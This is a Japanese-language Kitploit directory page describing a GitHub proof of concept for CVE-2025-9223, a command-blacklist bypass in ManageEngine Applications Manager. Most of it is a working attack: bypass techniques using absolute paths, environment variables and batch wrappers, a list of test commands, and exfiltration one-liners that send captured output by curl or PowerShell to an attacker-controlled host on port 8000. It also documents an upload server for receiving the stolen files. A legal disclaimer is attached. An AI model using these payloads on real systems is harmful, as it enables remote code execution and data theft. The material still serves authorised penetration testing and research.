Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2025-9223 — POC CVE-2025-9223 | Kitploit
ツール/GitHubGitHub/networkkiller/cve-2025-9223
脆弱性分析エクスプロイトウェブアプリケーション悪用データ流出ペネトレーションテストコマンド&コントロール学習と教育
GitHubnetworkkiller/cve-2025-9223

CVE-2025-9223

POC CVE-2025-9223

リポジトリを見る
29ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

Applications Manager - Execute Program Action Bypass PoC

Security Research Python 3.x Proof of Concept

📖 説明

このリポジトリには、ManageEngine Applications Managerの「Execute Program Action」機能におけるコマンド実行の脆弱性を実証する概念実証(PoC)が含まれています。

🔍 脆弱性の詳細

Applications Managerは危険なコマンドをブロックするためにブラックリスト(BlackListCommands)を使用していますが、検証には重大な欠陥があります。

  • 最初のトークンのみに基づく文字列検証
  • パスの正規化や環境変数の展開がない
  • スクリプト経由の間接実行に対する保護がない

🚨 バイパス手法

手法例
絶対パスC:\Windows\System32\netstat.exe
環境変数%SystemRoot%\System32\netstat.exe
スクリプトラッパーecho netstat > a.bat && a.bat

💥 影響

  • ✅ Applications Managerホスト上での認証済みリモートコード実行(RCE)
  • ✅ セキュリティ制限を回避した完全なシステムコマンド実行
  • ✅ システムユーティリティ(curl、powershell、certutil)を使用したデータ流出

📤 流出ペイロードの例

root@kitploit:~
C:\Windows\System32\netstat.exe > out.txt && C:\Windows\System32\curl.exe -X POST -F "[email protected]" http://[KALI_IP]:8000/upload

🛠️ 設定と使用法

前提条件

  • Python 3.x
  • 対象のApplications Managerインスタンスへのネットワークアクセス
  • 「Execute Program Action」の権限を持つ認証済みアクセス

ファイルアップロードサーバー

スクリプト upload_server.py は、流出したファイルを受信するためのシンプルなHTTPサーバーを提供します。

基本使用法

root@kitploit:~
python3 upload_server.py

高度なオプション

root@kitploit:~
python3 upload_server.py --host 0.0.0.0 --port 8000 --dir ./uploads

パラメータ

  • --host: バインドアドレス(デフォルト: 0.0.0.0)
  • --port: HTTPポート(デフォルト: 8000)
  • --dir: 出力ディレクトリ(デフォルト: カレントディレクトリ)

API エンドポイント

メソッド

セキュリティ機能

✅ パストラバーサル対策 ✅ タイムスタンプによる一意なファイル名 ✅ IPとUser-Agentのリクエストログ ✅ コンテンツタイプの検証

🎯 テストコマンド

test_commands.txt ファイルを作成し、バイパスの例を含めます:

root@kitploit:~
# Bypass con ruta absoluta
C:\Windows\System32\whoami.exe
C:\Windows\System32\netstat.exe -an

# Bypass con variables de entorno
%SystemRoot%\System32\ipconfig.exe
%SystemRoot%\System32\systeminfo.exe

# Bypass con script wrapper
echo ipconfig > test.bat && test.bat
echo whoami > test.bat && call test.bat

# Ejemplos de exfiltración de datos
C:\Windows\System32\ipconfig.exe > network.txt && C:\Windows\System32\curl.exe -X POST -F "[email protected]" http://ATTACKER_IP:8000/upload
C:\Windows\System32\systeminfo.exe > system.txt && C:\Windows\System32\powershell.exe -c "Invoke-WebRequest -Uri http://ATTACKER_IP:8000/upload -Method POST -InFile system.txt"

⚠️ 法的注意事項

重要: このツールは教育目的および許可されたテスト目的のみで提供されています。

❌ 自分の所有していない、または明示的にテストする許可がないシステムでは使用しないでください ❌ 違法行為に使用しないでください ✅ セキュリティ調査のために管理された環境でのみ使用してください ✅ テストを実施する前に適切な許可を取得してください

著者は、このツールの誤用について一切の責任を負いません。ユーザーはすべての責任とリスクを負うものとします。

📄 ライセンス

このプロジェクトは研究および教育目的のみです。All rights reserved.

👨‍💻 著者

Johan Aybar - 教育目的


⚠️ 注意: このPoCは許可されたテスト環境でのみ使用してください。無許可での使用は違法となる可能性があり、厳に禁止されています。

ツールをダウンロード
エンドポイント
説明
GET/最近アップロードされたファイルの一覧表示
POST/uploadファイルのアップロード(multipart/form-data)
PUT/upload/[filename]ファイルの直接アップロード